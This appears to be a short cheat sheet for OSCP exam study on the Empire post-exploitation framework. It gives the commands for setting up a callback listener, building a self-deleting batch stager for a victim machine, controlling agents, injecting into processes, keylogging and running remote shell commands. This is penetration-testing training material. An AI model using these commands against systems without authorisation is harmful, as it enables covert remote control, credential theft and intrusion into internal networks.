Empire is a post-exploitation framework that includes PowerShell and Python.
Officially allowed during the OSCP exam according to the OSCP Exam FAQ
- EmpireProject (GitHub)
Installation
sudo apt install powershell-empireHelp
sudo powershell-empire -hWithin the client, type “help”.
Start Empire
Version 4.0.0+ is server-client architecture.
sudo powershell-empire serversudo powershell-empire clientListeners
Execute commands within the PowerShell Empire client.
Stagers are equivalent to Msfvenom payload that are executed on a victim machine and connect back to the listener.
List listeners
listenersStart a listener
The “redirector” listener creates a pivot that enables communications with an internal network through a compromised host.
Listener “http” is equivalent to windows/meterpreter/reverse_http.
uselistener http
set Host x.x.x.x
set Port 80
executeStager – Self-deleting batch file
The stager needs to be transferred and executed on the victim machine.
usestager windows/launcher_bat
set Listener http
executeMain menu
mainAgents
Once the stager is executed on the victim machine, an agent is created on the victim (final payload retrieved by the stager).
List agents
agentsConnect to the agent
interact <agent name>List available commands
helpProcesses
psMigrate payload to another process
The original agents remains active. Manually switch to the new agent.
psinject <listener type> <process ID>
agents
interact <agent name>psinject http 1234Keylogger
keylogShell commands
shell <command>shell dirshell "dir somefile.txt"